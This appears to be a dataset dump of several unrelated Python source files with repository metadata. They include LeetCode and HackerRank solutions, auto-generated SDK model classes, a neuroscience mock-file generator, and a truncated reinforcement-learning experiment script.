json.dump(data, json_file, ensure_ascii=False, indent=4)
def get_difficulty(data):
d = [] # 题目难度
u = [] # 上传率
li = [] # 代码行数
avg = []
avg_all = [] # 算术平均数
num_of_cases = []
for types in data.items():
avg.append(types[1]["avg_pass_rate"])
cor_pu = (types[1]["correlation_pu"]) # 通过率与上传率的相关系数
cor_pl = (types[1]["correlation_pl"]) # 通过率与代码行数的相关系数
for cases in types[1].items(): # 类别
if cases[0] == 'cases':
print(types[0], len(cases[1]))
num_of_cases.append([types[0], len(cases[1])])
for case in cases[1].items():
u.append(case[1]["up_rate"]*cor_pu)
li.append(case[1]["avg_lines"]*cor_pl)
d.append((1 - case[1]["pass_rate"])) # 1-该题通过率
avg_all.append(case[1]["pass_rate"])
# 映射到区间[1,5]
d1 = map_to(1, 5, d) # 映射后的试题难度
u1 = map_to(1, 5, u)
li1 = map_to(1, 5, li)
final_d = []
for i in range(0, len(d1)):
# 用上传次数和代码行数进行修正
final_d.append(get_final_d(d1[i], u1[i], li1[i], 0.846, 0.084))
cnt_easy = 0
cnt_medium = 0
cnt_hard = 0
for di in final_d:
if 1 <= di < 2.2: # 通过率70% easy
cnt_easy += 1
elif 2.2 <= di < 3.4: # 通过率70%-40% medium
cnt_medium += 1
else: # 通过率40%以下 hard
cnt_hard += 1
print("easy: ", cnt_easy, cnt_easy/882)
print("medium: ", cnt_medium, cnt_medium/882)
print("hard: ", cnt_hard, cnt_hard/882)
print("难度系数均值:", np.mean(final_d))
print("修正前通过率均值:", np.mean(avg_all))
print("修正后均值:", 1-np.mean(map_to(0, 1, final_d)))
print(avg)
return final_d
def get_final_d(k, m, n, alpha, beta): # 获取修正后的难度系数
return alpha*k + beta*m + (1-alpha-beta)*n
def get_diff_by_degree(degree): # 根据难度系数获取题目难度
if 1 <= degree < 2.2:
return "easy"
elif 2.2 <= degree < 3.4:
return "medium"
else:
return "hard"
def geometric_mean(data): # 计算几何平均数
total = 1
for i in data:
if i == 0:
continue
total *= Decimal(str(format(i, ".2f")))
# print(float(format(i, ".2f")))
return total ** Decimal(1.0/len(data))
def map_to(start, end, data): # 将数据映射到指定区间
d_min = np.min(data)
d_max= np.max(data)
res = []
for d in data:
res.append(start+(end-start)/(d_max-d_min)*(d-d_min))
return res
def get_result(data, final_d):
res = {}
i = 0
for types in data.items():
if types[0] not in res.keys():
res[types[0]] = {"cases": types[1]}
for cid, case in types[1].items():
res[types[0]]["cases"][cid] = case
res[types[0]]["cases"][cid]["degree"] = final_d[i]
res[types[0]]["cases"][cid]["difficulty"] = get_diff_by_degree(final_d[i])
i += 1
print(i)
return res
if __name__ == "__main__":
with open("../Data/final_data_v2.json", 'r', encoding="utf-8") as f:
_data = json.loads(f.read())
final_data = get_difficulty(_data)
with open("../Data/final_data.json", 'r', encoding="utf-8") as f:
_data = json.loads(f.read())
result = get_result(_data, final_data)
# save_as_file(result, "../Data/result.json")
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
c7f5f003abb3040b1524784d99a06585be3ae3cc
|
5afd733a5c1f753601c69b8b4eae1b49edfbae7c
|
/1-100/26.py
|
fa36e700d0e1f5ab060ef83dfb14183c587f6ef8
|
[] |
no_license
|
yanbinbi/leetcode
|
9dcd4a0160be915006455b83d6b7cd39e9819811
|
616a868bfa7bdd00195067b0477b0236a72d23e0
|
refs/heads/master
| 2021-05-13T19:34:17.222576
| 2017-11-12T02:04:31
| 2017-11-12T02:04:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
class Solution(object):
def removeDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
size = len(nums)
if size == 0:
return 0
j = 0
for i in range(1,size):
if nums[i] > nums[j]:
j += 1
if i != j:
nums[j] = nums[i]
return j+1
|
[
"xukaifeng1986@gmail.com"
] |
xukaifeng1986@gmail.com
|
aa034bd935af2335c3c1651436ae7001c1fde500
|
a4525c981552117dabdf5f952ced15997199da32
|
/ask-smapi-model/ask_smapi_model/v1/skill/interaction_model/model_type/slot_type_definition_output.py
|
5a60b84255908d1a8d2553d4ce4a24b9d61f9ea7
|
[
"Apache-2.0"
] |
permissive
|
muskanmahajan37/alexa-apis-for-python
|
29b3b8e45bb009fa56ba0a2a73ed2f50efe77f65
|
8e0c90a3031f5afd8a2e62d19b51fe392e7da1af
|
refs/heads/master
| 2022-11-09T01:14:58.947495
| 2020-06-25T17:33:19
| 2020-06-25T17:33:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,919
|
py
|
# coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input import SlotTypeInputV1
class SlotTypeDefinitionOutput(object):
"""
Slot Type request definitions.
:param slot_type:
:type slot_type: (optional) ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput
:param total_versions: Total number of versions.
:type total_versions: (optional) str
"""
deserialized_types = {
'slot_type': 'ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput',
'total_versions': 'str'
} # type: Dict
attribute_map = {
'slot_type': 'slotType',
'total_versions': 'totalVersions'
} # type: Dict
supports_multiple_types = False
def __init__(self, slot_type=None, total_versions=None):
# type: (Optional[SlotTypeInputV1], Optional[str]) -> None
"""Slot Type request definitions.
:param slot_type:
:type slot_type: (optional) ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput
:param total_versions: Total number of versions.
:type total_versions: (optional) str
"""
self.__discriminator_value = None # type: str
self.slot_type = slot_type
self.total_versions = total_versions
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {} # type: Dict
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, SlotTypeDefinitionOutput):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
|
[
"ask-pyth@dev-dsk-ask-sdk-python-2b-85d79f62.us-west-2.amazon.com"
] |
ask-pyth@dev-dsk-ask-sdk-python-2b-85d79f62.us-west-2.amazon.com
|
46b7f2b1be3242b3a9fd4117a6a4d2ec15eabc2a
|
7cb646a87705156e9d6e0b651df4c0a90a99947b
|
/phy/io/mock/kwik.py
|
eed05ce223d2cfe13a1c77dd59cf3e8a4654db4d
|
[] |
no_license
|
cgestes/phy
|
1339b8ce46ac076129496745c23d87bfc73e6407
|
8bb7b9377e6376dce46ef123ccc97ecf3671fb15
|
refs/heads/master
| 2021-01-18T10:21:35.785483
| 2015-04-16T11:42:39
| 2015-04-16T13:51:57
| 30,656,835
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,009
|
py
|
# -*- coding: utf-8 -*-
"""Mock Kwik files."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import os.path as op
import numpy as np
from ...io.mock.artificial import (artificial_spike_samples,
artificial_spike_clusters,
artificial_features,
artificial_masks,
artificial_traces)
from ...electrode.mea import staggered_positions
from ..h5 import open_h5
from ..kwik_model import _kwik_filenames, _create_clustering
#------------------------------------------------------------------------------
# Mock Kwik file
#------------------------------------------------------------------------------
def create_mock_kwik(dir_path, n_clusters=None, n_spikes=None,
n_channels=None, n_features_per_channel=None,
n_samples_traces=None,
with_kwx=True, with_kwd=True):
"""Create a test kwik file."""
filename = op.join(dir_path, '_test.kwik')
filenames = _kwik_filenames(filename)
kwx_filename = filenames['kwx']
kwd_filename = filenames['raw.kwd']
# Create the kwik file.
with open_h5(filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
def _write_metadata(key, value):
f.write_attr('/application_data/spikedetekt', key, value)
_write_metadata('sample_rate', 20000.)
# Filter parameters.
_write_metadata('filter_low', 500.)
_write_metadata('filter_high', 0.95 * .5 * 20000.)
_write_metadata('filter_butter_order', 3)
_write_metadata('extract_s_before', 15)
_write_metadata('extract_s_after', 25)
_write_metadata('nfeatures_per_channel', n_features_per_channel)
# Create spike times.
spike_samples = artificial_spike_samples(n_spikes).astype(np.int64)
spike_recordings = np.zeros(n_spikes, dtype=np.uint16)
# Size of the first recording.
recording_size = 2 * n_spikes // 3
# Find the recording offset.
recording_offset = spike_samples[recording_size]
recording_offset += spike_samples[recording_size + 1]
recording_offset //= 2
spike_recordings[recording_size:] = 1
# Make sure the spike samples of the second recording start over.
spike_samples[recording_size:] -= spike_samples[recording_size]
spike_samples[recording_size:] += 10
if spike_samples.max() >= n_samples_traces:
raise ValueError("There are too many spikes: decrease 'n_spikes'.")
f.write('/channel_groups/1/spikes/time_samples', spike_samples)
f.write('/channel_groups/1/spikes/recording', spike_recordings)
f.write_attr('/channel_groups/1',
'channel_order',
np.arange(1, n_channels - 1)[::-1],
)
# Create channels.
positions = staggered_positions(n_channels)
for channel in range(n_channels):
group = '/channel_groups/1/channels/{0:d}'.format(channel)
f.write_attr(group, 'name', str(channel))
f.write_attr(group, 'position', positions[channel])
# Create spike clusters.
clusterings = [('main', n_clusters),
('automatic', n_clusters * 2),
]
for clustering, n_clusters_rec in clusterings:
spike_clusters = artificial_spike_clusters(n_spikes,
n_clusters_rec)
_create_clustering(f, clustering, 1, spike_clusters)
# Create recordings.
f.write_attr('/recordings/0', 'name', 'recording_0')
f.write_attr('/recordings/1', 'name', 'recording_1')
# Create the kwx file.
if with_kwx:
with open_h5(kwx_filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
features = artificial_features(n_spikes,
(n_channels - 2) *
n_features_per_channel)
masks = artificial_masks(n_spikes,
(n_channels - 2) *
n_features_per_channel)
fm = np.dstack((features, masks)).astype(np.float32)
f.write('/channel_groups/1/features_masks', fm)
# Create the raw kwd file.
if with_kwd:
with open_h5(kwd_filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
traces = artificial_traces(n_samples_traces, n_channels)
# TODO: int16 traces
f.write('/recordings/0/data',
traces[:recording_offset, ...].astype(np.float32))
f.write('/recordings/1/data',
traces[recording_offset:, ...].astype(np.float32))
return filename
|
[
"cyrille.rossant@gmail.com"
] |
cyrille.rossant@gmail.com
|
c72670766922c59f54f1e38c3251a93c3d29440e
|
8ed4bf9fbead471c9e5f88e4d18ac432ec3d628b
|
/hackerrank/algorithm/string/reduced_string.py
|
0fec6e1adc81c9b8b46f35b176b59a2b2e96024b
|
[] |
no_license
|
hizbul25/programming_problem
|
9bf26e49ed5bb8c9c829d00e765c9401222fb35c
|
2acca363704b993ffe5f6c2b00f81a4f4eca7204
|
refs/heads/master
| 2021-01-10T22:28:26.105787
| 2018-01-21T16:45:45
| 2018-01-21T16:45:45
| 65,394,734
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
# URL: https://www.hackerrank.com/challenges/reduced-string
s = input()
stack = []
for i in range(len(s)):
if not stack or s[i] != stack[-1]:
stack += [s[i]]
else:
stack.pop()
if stack:
print(''.join(stack))
else:
print('Empty String')
|
[
"hizbul.ku@gmail.com"
] |
hizbul.ku@gmail.com
|
c2f63be45f8a4ef6445fb0981f9ae21611bb6d46
|
82b946da326148a3c1c1f687f96c0da165bb2c15
|
/sdk/python/pulumi_azure_native/web/v20181101/get_web_app_swift_virtual_network_connection_slot.py
|
5279f9e04c7689c8359817ea2659e83821fa878c
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
morrell/pulumi-azure-native
|
3916e978382366607f3df0a669f24cb16293ff5e
|
cd3ba4b9cb08c5e1df7674c1c71695b80e443f08
|
refs/heads/master
| 2023-06-20T19:37:05.414924
| 2021-07-19T20:57:53
| 2021-07-19T20:57:53
| 387,815,163
| 0
| 0
|
Apache-2.0
| 2021-07-20T14:18:29
| 2021-07-20T14:18:28
| null |
UTF-8
|
Python
| false
| false
| 5,220
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'GetWebAppSwiftVirtualNetworkConnectionSlotResult',
'AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult',
'get_web_app_swift_virtual_network_connection_slot',
]
@pulumi.output_type
class GetWebAppSwiftVirtualNetworkConnectionSlotResult:
"""
Swift Virtual Network Contract. This is used to enable the new Swift way of doing virtual network integration.
"""
def __init__(__self__, id=None, kind=None, name=None, subnet_resource_id=None, swift_supported=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if subnet_resource_id and not isinstance(subnet_resource_id, str):
raise TypeError("Expected argument 'subnet_resource_id' to be a str")
pulumi.set(__self__, "subnet_resource_id", subnet_resource_id)
if swift_supported and not isinstance(swift_supported, bool):
raise TypeError("Expected argument 'swift_supported' to be a bool")
pulumi.set(__self__, "swift_supported", swift_supported)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="subnetResourceId")
def subnet_resource_id(self) -> Optional[str]:
"""
The Virtual Network subnet's resource ID. This is the subnet that this Web App will join. This subnet must have a delegation to Microsoft.Web/serverFarms defined first.
"""
return pulumi.get(self, "subnet_resource_id")
@property
@pulumi.getter(name="swiftSupported")
def swift_supported(self) -> Optional[bool]:
"""
A flag that specifies if the scale unit this Web App is on supports Swift integration.
"""
return pulumi.get(self, "swift_supported")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult(GetWebAppSwiftVirtualNetworkConnectionSlotResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWebAppSwiftVirtualNetworkConnectionSlotResult(
id=self.id,
kind=self.kind,
name=self.name,
subnet_resource_id=self.subnet_resource_id,
swift_supported=self.swift_supported,
type=self.type)
def get_web_app_swift_virtual_network_connection_slot(name: Optional[str] = None,
resource_group_name: Optional[str] = None,
slot: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult:
"""
Swift Virtual Network Contract. This is used to enable the new Swift way of doing virtual network integration.
:param str name: Name of the app.
:param str resource_group_name: Name of the resource group to which the resource belongs.
:param str slot: Name of the deployment slot. If a slot is not specified, the API will get a gateway for the production slot's Virtual Network.
"""
__args__ = dict()
__args__['name'] = name
__args__['resourceGroupName'] = resource_group_name
__args__['slot'] = slot
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:web/v20181101:getWebAppSwiftVirtualNetworkConnectionSlot', __args__, opts=opts, typ=GetWebAppSwiftVirtualNetworkConnectionSlotResult).value
return AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult(
id=__ret__.id,
kind=__ret__.kind,
name=__ret__.name,
subnet_resource_id=__ret__.subnet_resource_id,
swift_supported=__ret__.swift_supported,
type=__ret__.type)
|
[
"noreply@github.com"
] |
morrell.noreply@github.com
|
e2daa17da7418fb80cec9ab0745d804c304546ab
|
fee71dd79c16f8e4aa4be46aa25863a3e8539a51
|
/ear/core/delay.py
|
58999508e96ec84140b7be0b2066bb0c4deb9373
|
[
"BSD-3-Clause-Clear"
] |
permissive
|
ebu/ebu_adm_renderer
|
d004ed857b3004c9de336426f402654779a0eaf8
|
ef2189021203101eab323e1eccdd2527b32a5024
|
refs/heads/master
| 2023-08-09T09:13:06.626698
| 2022-12-07T12:22:39
| 2022-12-07T12:22:39
| 123,921,945
| 61
| 13
|
BSD-3-Clause-Clear
| 2023-08-30T17:17:05
| 2018-03-05T13:15:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,676
|
py
|
import numpy as np
class Delay(object):
"""Multi-channel delay line.
Parameters:
nchannels (int): number of channels to process
delay (int): number of samples to delay by
"""
def __init__(self, nchannels, delay):
assert delay >= 0
self.delaymem = np.zeros((delay, nchannels))
self.delay = delay
def process(self, input_samples):
"""Push n samples through the delay line.
Parameters:
input_samples (array of nsamples by nchannels): input samples
Returns:
array of nsamples by nchannels: output samples, delayed by delay
samples.
"""
output = np.zeros_like(input_samples)
# transfer samples from the delay memory followed by the input, to the
# output followed by the new delay memory, such that concat(src) before
# the transfer has the same value as concat(dst) after
src = [self.delaymem, input_samples]
dst = [output, self.delaymem]
# copy the common part of src[0] and dst[0]
start_len = min(len(src[0]), len(dst[0]))
if start_len: dst[0][:start_len] = src[0][:start_len]
# copy the part where src[0] overlaps dst[1] or src[1] overlaps dst[0]
overlap = len(src[0]) - len(dst[0])
if overlap > 0: # src[0] longer
dst[1][:overlap] = src[0][-overlap:]
elif overlap < 0: # dst[0] longer
dst[0][overlap:] = src[1][:-overlap]
# copy the common part of src[1] and dst[1]
end_len = min(len(src[1]), len(dst[1]))
if end_len: dst[1][-end_len:] = src[1][-end_len:]
return output
|
[
"tom@tomn.co.uk"
] |
tom@tomn.co.uk
|
42803d5018e53b70b319b1d8fc3cfa2d380118f7
|
b8d2f095a4b7ea567ccc61ee318ba879318eec3d
|
/数组 Array/228. 汇总区间.py
|
2459ae5ea8ae5dd79af2263fa4cdbfdda2c61f89
|
[] |
no_license
|
f1amingo/leetcode-python
|
a3ef78727ae696fe2e94896258cfba1b7d58b1e3
|
b365ba85036e51f7a9e018767914ef22314a6780
|
refs/heads/master
| 2021-11-10T16:19:27.603342
| 2021-09-17T03:12:59
| 2021-09-17T03:12:59
| 205,813,698
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 971
|
py
|
from typing import List
class Solution:
def summaryRanges(self, nums: List[int]) -> List[str]:
if not nums:
return []
ans = []
lt, rt = nums[0], None
for i in range(len(nums) - 1):
if nums[i + 1] - nums[i] == 1:
# if t is None 和 if not t 并不等价
if lt is None:
lt = nums[i]
rt = nums[i + 1]
else:
ans.append(str(lt) + '->' + str(rt) if rt else str(lt))
lt, rt = nums[i + 1], None
ans.append(str(lt) + '->' + str(rt) if rt else str(lt))
return ans
assert Solution().summaryRanges([0]) == ['0']
assert Solution().summaryRanges([0, 1, 2, 4, 5, 7]) == ["0->2", "4->5", "7"]
assert Solution().summaryRanges([0, 2, 3, 4, 6, 8, 9]) == ["0", "2->4", "6", "8->9"]
assert Solution().summaryRanges([]) == []
assert Solution().summaryRanges([-1]) == ['-1']
|
[
"zsjperiod@foxmail.com"
] |
zsjperiod@foxmail.com
|
2ec9d717282626becf58a398a994ec197e90f564
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Kivy/python-for-android/pythonforandroid/recipes/ffpyplayer_codecs/__init__.py
|
599d8d30207ce572fac347c18e6677d753b80e58
|
[
"MIT"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:d196a4f300350342824820ae06ebac62968d8b22ad0fd350043b298a302af005
size 206
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
235d72234d9d44c9e16f8a005e6726574387a789
|
a689a72d3699883d7b58bd4ee3103373270bd0d5
|
/BOJ/Python/BOJ17135.py
|
5ecf7f7b4bd365d3f602a3d3ca99da2cd2830899
|
[] |
no_license
|
Oizys18/Algo
|
4670748c850dc9472b6cfb9f828a3ccad9c18981
|
45caafe22a8a8c9134e4ff3b227f5f0be94eefe7
|
refs/heads/master
| 2022-05-11T08:35:06.812539
| 2022-05-07T01:30:41
| 2022-05-07T01:30:41
| 202,690,024
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
# 캐슬 디펜스
from pprint import pprint as pp
import collections
import itertools
import copy
N, M, D = map(int, input().split())
mat = [[*map(int, input().split())] for _ in range(N)] + [[0]*M]
archers = [0]*M
def isMap(x, y):
if 0 <= x < N + 2 and 0 <= y < M:
return True
else:
return False
def BFS(field, x, y):
visit = [[0]*M for _ in range(N+1)]
queue = []
queue.append((0, x, y))
while queue:
depth, x, y = queue.pop(0)
if depth > D:
continue
if not visit[x][y]:
visit[x][y] = 1
if field[x][y] == 1:
return (x, y)
for dx, dy in [(0, -1), (-1, 0), (0, 1)]:
nx = x + dx
ny = y + dy
if isMap(nx, ny):
queue.append((depth+1, nx, ny))
def fight():
kills = 0
field = collections.deque(copy.deepcopy(mat))
while True:
turnKill = set()
for x in range(N + 1):
for y in range(M):
if field[x][y] == 2:
killed = BFS(field, x, y)
if killed:
turnKill.add(killed)
for xt, yt in turnKill:
field[xt][yt] = 0
kills += 1
field.extendleft([[0]*M])
del field[N]
flag = 0
for a in range(N):
for b in range(M):
if field[a][b]:
flag = 1
if not flag:
return kills
res = 0
for chosen_archer in itertools.combinations(range(M), 3):
for ca in chosen_archer:
mat[N][ca] = 2
tactics = fight()
if res < tactics:
res = tactics
mat[N] = [0]*M
print(res)
|
[
"oizys18@gmail.com"
] |
oizys18@gmail.com
|
98f5a7d9ab4b3f578ce6948bda3f56af31438973
|
eb42558f56fdb41526cc31ac4ef3a6937bf39e96
|
/ConfigDefinitions/UserConfigs/SMHTT_2017_MCOnly_AntiIso_Configs_Deep/WConfig.py
|
c3c70830e40ca4f509cffad86bf361a53146d0bb
|
[] |
no_license
|
samhiggie/Jesterworks
|
6906b042d3e200efb9bd10b70284ccd30661aa53
|
562e8cbb20d7e4b1d5b9bdba3715578cc66f097d
|
refs/heads/master
| 2020-09-11T19:35:59.770456
| 2019-11-16T12:37:35
| 2019-11-16T12:37:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 967
|
py
|
from ConfigDefinitions.JesterworksConfigurations import JesterworksConfiguration as Config
from ConfigDefinitions.BranchAdditions.UserDefinedCollections.SMHTT_2017_MC_Data_Collection import MC_Data_Collection as BranchCollection
from ConfigDefinitions.CuttingDefinitions.UserCutConfigs.SMHTT2017Cuts_MC_AntiIso_wDeep import SMHTT2017Cuts as CutConfig
from ConfigDefinitions.EndActionDefinitions.UserConfigs.GrabHistograms import HistogramGrabber as HistogramGrabber
DataConfig = Config()
DataConfig.Path = "/data/ccaillol/smhmt2017_svfitted_12oct/"
DataConfig.Files = ["W.root","W1.root","W2.root","W3.root","W4.root"]
DataConfig.InputTreeName = "mutau_tree"
DataConfig.SampleName = "W"
DataConfig.OutputPath = "/data/aloeliger/SMHTT_Selected_2017_MCOnly_AntiIso_Deep/"
DataConfig.OutputFile = "W.root"
DataConfig.OutputTreeName = 'mt_Selected'
DataConfig.BranchCollection = BranchCollection
DataConfig.CutConfig = CutConfig
DataConfig.EndAction = HistogramGrabber
|
[
"aloelige@cern.ch"
] |
aloelige@cern.ch
|
109a0b28a419817d509d6d4ce27db19a8f90c3ad
|
235fcd12177715b51f26715befb7cb1909f27126
|
/sleep_control/experiments/arxiv/experiment_QNN_Jan31_2249_LSTM.py
|
ad1ee787afca6d41b7db4289cd35014ed9d60009
|
[] |
no_license
|
xiaogaogaoxiao/dqn4wirelesscontrol
|
1d165977f01e263735865e2b6daeed51c4288b01
|
68c2c485e64cef260c0dcb3975a88af4fae97283
|
refs/heads/master
| 2020-06-16T17:05:45.038089
| 2017-02-10T07:30:12
| 2017-02-10T07:30:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,160
|
py
|
# System built-in modules
import time
from datetime import datetime
import sys
import os
from multiprocessing import Pool
project_dir = "../../"
log_file_name = "msg_QNN_Jan31_2249_LSTM_{}.log".format(sys.argv[1])
sys.path.append(project_dir)
sys_stdout = sys.stdout
# Project dependency modules
import pandas as pd
pd.set_option('mode.chained_assignment', None) # block warnings due to DataFrame value assignment
import lasagne
# Project modules
from sleep_control.traffic_emulator import TrafficEmulator
from sleep_control.traffic_server import TrafficServer
from sleep_control.controller import QController, DummyController, NController
from sleep_control.integration import Emulation
from sleep_control.env_models import SJTUModel
from rl.qtable import QAgent
from rl.qnn_theano import QAgentNN
from rl.mixin import PhiMixin, DynaMixin
# Composite classes
class Phi_QAgentNN(PhiMixin, QAgentNN):
def __init__(self, **kwargs):
super(Phi_QAgentNN, self).__init__(**kwargs)
class Dyna_QAgent(DynaMixin, QAgent):
def __init__(self, **kwargs):
super(Dyna_QAgent, self).__init__(**kwargs)
class Dyna_QAgentNN(DynaMixin, QAgentNN):
def __init__(self, **kwargs):
super(Dyna_QAgentNN, self).__init__(**kwargs)
# load from processed data
session_df =pd.read_csv(
filepath_or_buffer=project_dir+'/sleep_control/data/net_traffic_processed_dh3.dat',
parse_dates=['startTime_datetime', 'endTime_datetime', 'interArrivalDuration_datetime']
)
# Parameters
# |- Agent
# |- QAgent
actions = [(True, None), (False, 'serve_all')]
gamma, alpha = 0.9, 0.9 # TD backup
explore_strategy, epsilon = 'epsilon', 0.02 # exploration
# |- QAgentNN
# | - Phi
phi_length = 15
dim_state = (1, phi_length, 3+2)
range_state_slice = [(0, 10), (0, 10), (0, 10), (0, 1), (0, 1)]
range_state = [[range_state_slice]*phi_length]
# | - No Phi
# phi_length = 0
# dim_state = (1, 1, 3)
# range_state = ((((0, 10), (0, 10), (0, 10)),),)
def f_build_net(input_var=None, input_shape=None, num_outputs=None):
if input_shape is None or num_outputs is None:
raise ValueError('State or Action dimension not given!')
l_in = lasagne.layers.InputLayer(shape=input_shape, input_var=input_var)
d1, d2, d3, d4 = input_shape
l_shp1 = lasagne.layers.ReshapeLayer(l_in, (-1, d3, d4))
l_lstm = lasagne.layers.LSTMLayer(l_shp1, num_units=500, grad_clipping=10, only_return_final=True, precompute_input=True)
l_shp2 = lasagne.layers.ReshapeLayer(l_lstm, (-1, 500))
l_out = lasagne.layers.DenseLayer(
l_shp2, num_units=num_outputs,
nonlinearity=lasagne.nonlinearities.tanh)
return l_out
# | - Other params
momentum, learning_rate = 0.9, 0.01 # SGD
num_buffer, memory_size, batch_size, update_period, freeze_period = 2, 200, 100, 4, 16
reward_scaling, reward_scaling_update, rs_period = 1, 'adaptive', 32 # reward scaling
# |- Env model
model_type, traffic_window_size = 'IPP', 50
stride, n_iter, adjust_offset = 2, 3, 1e-22
eval_period, eval_len = 4, 100
n_belief_bins, max_queue_len = 100, 20
Rs, Rw, Rf, Co, Cw = 1.0, -1.0, -10.0, -5.0, -0.5
traffic_params = (model_type, traffic_window_size,
stride, n_iter, adjust_offset,
eval_period, eval_len,
n_belief_bins)
queue_params = (max_queue_len,)
beta = 0.5 # R = (1-beta)*ServiceReward + beta*Cost
reward_params = (Rs, Rw, Rf, Co, Cw, beta)
# |- DynaQ
num_sim = 5
# |- Env
# |- Time
start_time = pd.to_datetime("2014-10-15 09:40:00")
total_time = pd.Timedelta(days=7)
time_step = pd.Timedelta(seconds=2)
backoff_epochs = num_buffer*memory_size+phi_length
head_datetime = start_time - time_step*backoff_epochs
tail_datetime = head_datetime + total_time
TOTAL_EPOCHS = int(total_time/time_step)
# |- Reward
rewarding = {'serve': Rs, 'wait': Rw, 'fail': Rf}
te = TrafficEmulator(
session_df=session_df, time_step=time_step,
head_datetime=head_datetime, tail_datetime=tail_datetime,
rewarding=rewarding,
verbose=2)
ts = TrafficServer(cost=(Co, Cw), verbose=2)
env_model = SJTUModel(traffic_params, queue_params, reward_params, 2)
# agent = Dyna_QAgentNN(
# env_model=env_model, num_sim=num_sim,
agent = Phi_QAgentNN(
phi_length=phi_length,
dim_state=dim_state, range_state=range_state,
f_build_net = f_build_net,
batch_size=batch_size, learning_rate=learning_rate, momentum=momentum,
reward_scaling=reward_scaling, reward_scaling_update=reward_scaling_update, rs_period=rs_period,
update_period=update_period, freeze_period=freeze_period,
